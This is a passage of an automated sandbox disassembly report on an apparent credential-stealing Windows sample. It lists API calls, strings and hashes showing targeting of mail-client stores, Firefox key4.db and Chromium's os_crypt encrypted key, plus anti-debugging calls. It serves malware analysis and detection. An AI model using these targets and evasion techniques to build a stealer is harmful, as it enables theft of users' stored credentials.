                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileRead
                                                          • String ID: LK$Y[$ntdll.dll
                                                          • API String ID: 752142053-4222218168
                                                          • Opcode ID: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                          • Instruction ID: 4487220ceab9a8d4c25bfe658470c8f7c93894071a863f051833b6fbd766e42f
                                                          • Opcode Fuzzy Hash: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                          • Instruction Fuzzy Hash: C0E1BDB29043058BDB249F69C59516EBAE1EB85314F25893FE485FB3D0E33C89418B9F
                                                          APIs
                                                            • Part of subcall function 0041F916: VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                          • NtQueryInformationProcess.NTDLL(000000FF,0000001E,?,00000004,00000000), ref: 004223A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Query$InformationProcessVirtual
                                                          • String ID: ]^4$^^4$^^4$^^4
                                                          • API String ID: 1364735940-2923853987
                                                          • Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                          • Instruction ID: e1f5519adcfceb975286f451de33aaf8cbb4e2bcda804772fdea06b08d6dcce1
                                                          • Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                          • Instruction Fuzzy Hash: CD510B31B08271ABDB24891CA68097E62D45B44314FA44D2BFDD9EB328C2ADCDD6974F
                                                          APIs
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00433288
                                                          • GetSystemMetrics.USER32(00000001), ref: 004333C3
                                                          • GetSystemMetrics.USER32(00000000), ref: 0043341E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem$Create
                                                          • String ID: DISPLAY
                                                          • API String ID: 1087689917-865373369
                                                          • Opcode ID: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                          • Instruction ID: b761a9eed8f132f3d76dd51699d475c40aa8c4f3e32308c58242f5baaa05262b
                                                          • Opcode Fuzzy Hash: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                          • Instruction Fuzzy Hash: EA513672D041059BEF208F588845ABFB6A4EB9D312F34B563E516EB350D278CF814B9B
                                                          APIs
                                                          • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?,E3E203CD), ref: 004020D7
                                                          • ExitProcess.KERNEL32 ref: 00402428
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcessSleep
                                                          • String ID: Ku^%$Ku^%
                                                          • API String ID: 911557368-1067927601
                                                          • Opcode ID: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                          • Instruction ID: 7c1692d81d369eac2294152011f0ccab71a19272a549e25e1d59810d67b13e6b
                                                          • Opcode Fuzzy Hash: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                          • Instruction Fuzzy Hash: 82A1E571500B058BD7348E29D68862B76E0AB41714B248D3FE55BFBBE0D6FCE8459B0B
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(000000FF,0000001F,?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004227D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 9a%^$M%$M%
                                                          • API String ID: 1778838933-3204844187
                                                          • Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                          • Instruction ID: a14d1243167b6357461e6519a130038910b412cbb64089044718b0755659bab4
                                                          • Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                          • Instruction Fuzzy Hash: 5A819875F04229ABCF28DF58EAD06ADB7B0AB24300FE48557D451E7351D2BC8A81CB4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %localappdata%\Mailbird\Store$*.db$Mail Clients\Mailbird$\MessageIndex$kernel32.dll
                                                          • API String ID: 0-4169501468
                                                          • Opcode ID: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                          • Instruction ID: 37c33aadf0b1a5fededcf733a2f710a0aa0d7e8b715308be68c7b56e9875aa70
                                                          • Opcode Fuzzy Hash: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                          • Instruction Fuzzy Hash: C21209B1F4022A8BDF149B98A8C25BF7661EF10314FA4452BE411FA391D72D8A41CBDF
                                                          APIs
                                                          • lstrcmpiW.KERNELBASE(?,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0043B7A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcmpi
                                                          • String ID: VL6T$VL6T$kernel32.dll
                                                          • API String ID: 1586166983-858732239
                                                          • Opcode ID: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                          • Instruction ID: ac9e96eee08e7f4766fdf27955405b0e073298ede107f6bf942f2813ff7035d8
                                                          • Opcode Fuzzy Hash: 12c1549d627155c630d8ca6eb72fb2876e14e488023c5ebfadd3efd311715951
                                                          • Instruction Fuzzy Hash: F912BA71D045198BCF28CA5988967BEB6B0EB1D300F24651BDA06EB760D73CDD818BDB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: UL6T$VL6T$VL6T$kernel32.dll
                                                          • API String ID: 4038537762-2028718673
                                                          • Opcode ID: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                          • Instruction ID: c2102a5980ece967c5cd64c746778263c5b3406957fe7555e788f878a3f1dfdb
                                                          • Opcode Fuzzy Hash: 7f0570dafa6d19f3a3e4030d7ec8142c43fb6ca8828ccd976bb5ebe1ae7d6833
                                                          • Instruction Fuzzy Hash: 99420BB1D001199BDF288A98C8656BF76B0AB18310F241767E915FB3D0D37C8E95CB9B
                                                          APIs
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00405575
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CryptDataUnprotect
                                                          • String ID: crypt32.dll$os_c576xedrypt.encry576xedpted_key
                                                          • API String ID: 834300711-975908830
                                                          • Opcode ID: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                          • Instruction ID: 8c3ac9f04a9491c7941596228a2b8d17953981cc6a452a8cfbc5ca82bdd136a5
                                                          • Opcode Fuzzy Hash: 6ec49e03afd1e886a5d6749f16ab2b942470457bc97d4b462b27af3ea700647b
                                                          • Instruction Fuzzy Hash: 4402B4B1E00A098FDF249A98DC816BFBB74EB14314F24457BE915FA3E0D37989418F5A
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,0043047B), ref: 0042F315
                                                          • lstrcatW.KERNEL32(?,\key4.db), ref: 0042F31F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: \key4.db
                                                          • API String ID: 4038537762-2908133219
                                                          • Opcode ID: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                          • Instruction ID: 3d8cc84be03ebf0018643bd6ad0f3ea75a9045ade11442e12932e6ab408eecf0
                                                          • Opcode Fuzzy Hash: c274c9b68e34842f206bf802bf848d073bbe615893bbf2fcb8277165c47de0ca
                                                          • Instruction Fuzzy Hash: C37198A6F0012996DF249968BC4157F23B16B92710FF40977E005DB391E27ECD8987AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Mail Clients\eM Client$]^4$^^4$^^4
                                                          • API String ID: 0-1928883120
                                                          • Opcode ID: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                          • Instruction ID: 9be5ae4bf1e72463837e643df42d36053b45937ac977a5871966d9d3f700dc7e
                                                          • Opcode Fuzzy Hash: 490cee9e03f46942998cbacae6b351251b9d38460da8d0580215e8d3c57ef9a7
                                                          • Instruction Fuzzy Hash: 5CE14DB1F4012A8BDF189E54FD822BF7662AB14304FA4052BE015FA395E73DCA4187DB
                                                          APIs
                                                            • Part of subcall function 0044E224: RtlFreeHeap.NTDLL(00000000,00000000,?,00447A98,00426F52,?,?), ref: 0044E23A
                                                            • Part of subcall function 0044E224: GetLastError.KERNEL32(?,?,00447A98,00426F52,?,?), ref: 0044E245
                                                          • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00454058,004170BE,?), ref: 00453C36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapInformationLastTimeZone
                                                          • String ID: Eastern Standard Time$Eastern Summer Time
                                                          • API String ID: 3335090040-239921721
                                                          • Opcode ID: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                          • Instruction ID: 7ab12ca904d85c611abf05cc92b1328e63041ffa610859c45aae75821d6d65e9
                                                          • Opcode Fuzzy Hash: 2af139a3764a0c05745c62e5f991a316996d580cafce79d7789892506ed109ab
                                                          • Instruction Fuzzy Hash: DA3159B2D00115ABCB11AFA6DC4695ABB74EF05797F10406BF804A7162E7789F04CB99
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: gU@
                                                          • API String ID: 0-63564854
                                                          • Opcode ID: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                          • Instruction ID: 9bb5ed087af5853c8395ebcf4a55f6806a95a7423fdc301e10d6eb9c751f7a08
                                                          • Opcode Fuzzy Hash: 8bc7925b9e038d193efd2d2866c7942856053ba973fa878822b50d9ea5857523
                                                          • Instruction Fuzzy Hash: 4FE1D871D042198BDF249B6888826BEBA70BB1D310F24252FE559FB390D77CCD418B9B
                                                          APIs
                                                          • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: ntdll.dll
                                                          • API String ID: 3535843008-2227199552
                                                          • Opcode ID: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                          • Instruction ID: 07c00f1c427ac074378915b2824e934ab5066280a98a6b1b7d7a0ad64244f161
                                                          • Opcode Fuzzy Hash: cd4e9ab95000133a587c79dbdb14eef8d6e48608e068825cd0d0d3dffcb8006f
                                                          • Instruction Fuzzy Hash: 7DF0E992A0016279E6106A669C0197B768CDE86361F144533F815E73D1E33C8E0192FE
                                                          APIs
                                                          • NtClose.NTDLL(00000000,?,?,?), ref: 0040B80B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID: ntdll.dll
                                                          • API String ID: 3535843008-2227199552
                                                          • Opcode ID: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                          • Instruction ID: f273f3d0fb77e3baaf18c0c5406a57793bb7cae49ecc4258f7fe46d16d2ae272
                                                          • Opcode Fuzzy Hash: fc421d87402b4386972566e4e5051b6ecebdf77c0c0cd5e6f8509a3cd20f6b8d
                                                          • Instruction Fuzzy Hash: 08C08063F8102166850175D47C035AD631CD9D8337F1C4437F91AF2301F525161D01FB
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0079A196
                                                          • Module32First.KERNEL32(00000000,00000224), ref: 0079A1B6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572460076.0000000000799000.00000040.00000020.00020000.00000000.sdmp, Offset: 00799000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_799000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3833638111-0
                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction ID: 95d9f7b91b663858ee68f393bb58a6c4f66c5c1f8f370ef10df73c45c97402f1
                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                          • Instruction Fuzzy Hash: 6CF096325417147BEB203BF9B88DBAE76F9AF49724F100528E646910C0DB78EC458AA2
                                                          APIs
                                                          • NtQuerySystemInformation.NTDLL(00000023,?,00000002,00000000), ref: 00424811
                                                            • Part of subcall function 004262A1: LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationLibraryLoadQuerySystem
                                                          • String ID:
                                                          • API String ID: 1217483125-0
                                                          • Opcode ID: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                          • Instruction ID: a7ee391c1cc3a25a3919c4d00fef5949a9432234e98ec336f1522245060c6ad6
                                                          • Opcode Fuzzy Hash: 87505e49a8eb848821dffb05ea81a0e5641ec38d0459a75f9f4d4ff82dc7fd33
                                                          • Instruction Fuzzy Hash: 1471C5B1B08261CBCB24DF18A58112EB6E0FBC5314FA65D1FE496EB351D63CC8858B5B
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(000000FF,00000007,FFFFFF06,00000004,00000000), ref: 00421F7A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID:
                                                          • API String ID: 1778838933-0
                                                          • Opcode ID: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                          • Instruction ID: 4c19edd8aa9c17fc0a78f2ac854e6ceab7ff99fd175543fb6d48c07bc42e7691
                                                          • Opcode Fuzzy Hash: 66d74e5b20d9c384740991f0b87e692f2e80e905805bc9109d63d683fad776b8
                                                          • Instruction Fuzzy Hash: B151B730F081359BCF248B5CAA8076DBAA5AB24315FA14517EB25E73B4C379DD81874B
                                                          APIs
                                                          • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64), ref: 004245E5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationThread
                                                          • String ID:
                                                          • API String ID: 4046476035-0
                                                          • Opcode ID: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                          • Instruction ID: e4e78e09ab512bb18b464cd4d2f873358ef8636b72ff0900b4d62f7f8a955cf4
                                                          • Opcode Fuzzy Hash: 5af1248077b72cee271f1dc4513ba9fdd6fbe0fa2681126dcf50cb3d141ba941
                                                          • Instruction Fuzzy Hash: 372132B57046216BC7249E1CA84253EA6D4EBD8314F55593BFACBEF750D238CC809B87
                                                          APIs
                                                          • NtClose.NTDLL(F2E4C6A8,00000000), ref: 0042F21D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                          • Instruction ID: a368c7a5dfb214292b8ef9e9d0bae651ecd455d0456980d3106c0b1a917b6dbd
                                                          • Opcode Fuzzy Hash: 1c25e0eb5abf8d8b8060ecc68c24b031f84286c1c8975e7eed6408469da21eb6
                                                          • Instruction Fuzzy Hash: 9DF06DB1900644DFD710DF99E989B5AFBF8EB48724F10C16AE4289B751D33C5844CF68
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                          • Instruction ID: c1995cbfc35cf923d3c3ea23a15c0124f92d8ae5a77ba2b7d44262ced24471db
                                                          • Opcode Fuzzy Hash: 5466edf919cf6453cb3fe632e64b7bc90129a20e483f7dfcae3dbb783ead61c5
                                                          • Instruction Fuzzy Hash: AFE08C72912278EBCB15DB89C945D8AF3FCEB49B14B2500ABB501D3200C674EE04CBD4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction ID: 17c6e2c9dd4ac5a7344e966d1587fdb4c68b9ede7c11da59021095b760417012
                                                          • Opcode Fuzzy Hash: e9c2f219f0a9af3f176a5929433c540c90c9a3d9d29b5cff4e9fefba7a9b2e30
                                                          • Instruction Fuzzy Hash: 09C08C7410098046EF298D10C271BA63364FBA2BCBF8005CEC4420BB46C66EAD8AD654

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4992 42f625-42f644 4993 42f64a-42f652 4992->4993 4994 42f654-42f659 4993->4994 4995 42f69b-42f6a0 4993->4995 4998 42f713-42f718 4994->4998 4999 42f65f-42f664 4994->4999 4996 42f756-42f75b 4995->4996 4997 42f6a6-42f6ab 4995->4997 5000 42f761-42f766 4996->5000 5001 42f8a4-42f8a9 4996->5001 5002 42f811-42f816 4997->5002 5003 42f6b1-42f6b6 4997->5003 5004 42f850-42f855 4998->5004 5005 42f71e-42f723 4998->5005 5006 42f7ca-42f7cf 4999->5006 5007 42f66a-42f66f 4999->5007 5008 42f984-42f989 5000->5008 5009 42f76c-42f771 5000->5009 5016 42fa29-42fa2e 5001->5016 5017 42f8af-42f8b4 5001->5017 5020 42f81c-42f821 5002->5020 5021 42f9dd-42f9e2 5002->5021 5012 42f8fa-42f8ff 5003->5012 5013 42f6bc-42f6c1 5003->5013 5010 42f85b-42f860 5004->5010 5011 42fa0e-42fa13 5004->5011 5018 42f93b-42f940 5005->5018 5019 42f729-42f72e 5005->5019 5014 42f9b0-42f9b5 5006->5014 5015 42f7d5-42f7da 5006->5015 5022 42f675-42f67a 5007->5022 5023 42f8d8-42f8dd 5007->5023 5044 42fca5-42fcc9 5008->5044 5045 42f98f-42f994 5008->5045 5040 42fd10-42fd17 5009->5040 5041 42f777-42f77c 5009->5041 5026 42f866-42f86b 5010->5026 5027 42fa75-42fa86 lstrcatW 5010->5027 5024 42fa19-42fa1e 5011->5024 5025 42faad-42fab4 5011->5025 5038 42fc57-42fc6c lstrcatW 5012->5038 5039 42f905-42f90a 5012->5039 5030 42faf7-42fb08 lstrcatW 5013->5030 5031 42f6c7-42f6cc 5013->5031 5048 42f9bb-42f9c0 5014->5048 5049 42fcd8-42fcdf 5014->5049 5046 42f7e0-42f7e5 5015->5046 5047 42fb7d-42fbad 5015->5047 5028 42fa34-42fa39 5016->5028 5029 42fab9-42fac6 5016->5029 5032 42f8ba-42f8bf 5017->5032 5033 42fa8b-42faa8 5017->5033 5042 42fc71-42fc96 5018->5042 5043 42f946-42f94b 5018->5043 5034 42f734-42f739 5019->5034 5035 42fb0d-42fb39 5019->5035 5050 42f827-42f82c 5020->5050 5051 42fbe9-42fc18 call 42f625 call 430228 5020->5051 5052 42fce4-42fcef 5021->5052 5053 42f9e8-42f9ed 5021->5053 5054 42f680-42f685 5022->5054 5055 42facb-42fad9 5022->5055 5036 42f8e3-42f8e8 5023->5036 5037 42fc27-42fc4a 5023->5037 5059 42fa24 5024->5059 5060 42fcfb 5024->5060 5025->4993 5026->4993 5077 42f871-42f894 5026->5077 5027->4993 5028->4993 5061 42fa3f-42fa70 call 419e6b call 447a80 * 2 5028->5061 5029->4993 5030->4993 5062 42f6d2-42f6d7 5031->5062 5063 42fc1b-42fc22 5031->5063 5032->4993 5080 42f8c5-42f8d3 5032->5080 5033->4993 5064 42fb49-42fb6c call 447047 lstrcatW 5034->5064 5065 42f73f-42f744 5034->5065 5068 42fcd0-42fcd3 5035->5068 5069 42fb3f-42fb44 5035->5069 5036->4993 5082 42f8ee-42f8f5 5036->5082 5037->5068 5078 42fc50-42fc55 5037->5078 5038->4993 5039->4993 5083 42f910-42f91b call 40b129 5039->5083 5040->4993 5066 42f782-42f787 5041->5066 5067 42fb71-42fb78 5041->5067 5073 42fc9d-42fca0 5042->5073 5079 42fc98 5042->5079 5043->4993 5085 42f951-42f974 5043->5085 5044->5068 5081 42fccb 5044->5081 5045->4993 5086 42f99a-42f9ab lstrcatW 5045->5086 5070 42f7eb-42f7f0 5046->5070 5071 42fbbd-42fbd2 lstrcatW * 2 call 40b7bb 5046->5071 5072 42fbb3-42fbb8 5047->5072 5047->5073 5048->4993 5087 42f9c6-42f9d8 lstrcatW 5048->5087 5049->4993 5074 42f832-42f84b call 447047 5050->5074 5075 42fd1c-42fd21 5050->5075 5051->5063 5052->5060 5084 42fcf1-42fcf9 5052->5084 5053->4993 5056 42f9f3-42fa09 5053->5056 5057 42f68b-42f690 5054->5057 5058 42fade-42fae7 5054->5058 5055->4993 5056->4993 5057->4993 5088 42f692-42f699 5057->5088 5058->5068 5092 42faed-42faf2 5058->5092 5059->4993 5101 42fcfc 5060->5101 5061->4993 5062->4993 5090 42f6dd-42f703 5062->5090 5063->4993 5064->4993 5065->4993 5091 42f74a-42f751 5065->5091 5066->4993 5093 42f78d-42f7ba 5066->5093 5067->4993 5068->4993 5069->5068 5070->4993 5095 42f7f6-42f801 5070->5095 5109 42fbd7-42fbe4 5071->5109 5072->5073 5073->4993 5074->4993 5075->4993 5102 42fd27-42fd34 5075->5102 5077->5068 5099 42f89a-42f89f 5077->5099 5078->5068 5079->5073 5080->4993 5081->5068 5082->4993 5112 42f920-42f936 5083->5112 5084->5040 5084->5060 5085->5068 5103 42f97a-42f97f 5085->5103 5086->4993 5087->4993 5088->4993 5090->5068 5105 42f709-42f70e 5090->5105 5091->4993 5092->5068 5093->5073 5106 42f7c0-42f7c5 5093->5106 5095->5068 5108 42f807-42f80c 5095->5108 5099->5068 5101->5101 5103->5068 5105->5068 5106->5073 5108->5068 5109->4993 5112->4993
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,?), ref: 0042F9A2
                                                          • lstrcatW.KERNEL32(?,?), ref: 0042F9CF
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0042FA7D
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0042FAFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.4572220113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_cgln32y2HF.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: (lu$)lu$)lu$n_v$n_v$n_v
                                                          • API String ID: 4038537762-1534030094
                                                          • Opcode ID: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                          • Instruction ID: 4b57ba66ae2396d09571da8aec8c9542c80e7c55b9c92ca3ddc1ba6dd1b7a9a6
                                                          • Opcode Fuzzy Hash: 072b878477c295eb77043ba653f905b2afdd85461ce88a646d5d7cd4a06fd790
                                                          • Instruction Fuzzy Hash: 7AF11D71B0012E9BCF289F99E8515BEBAB4FB54310FE44537E401EA3B0D37989469B4B

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
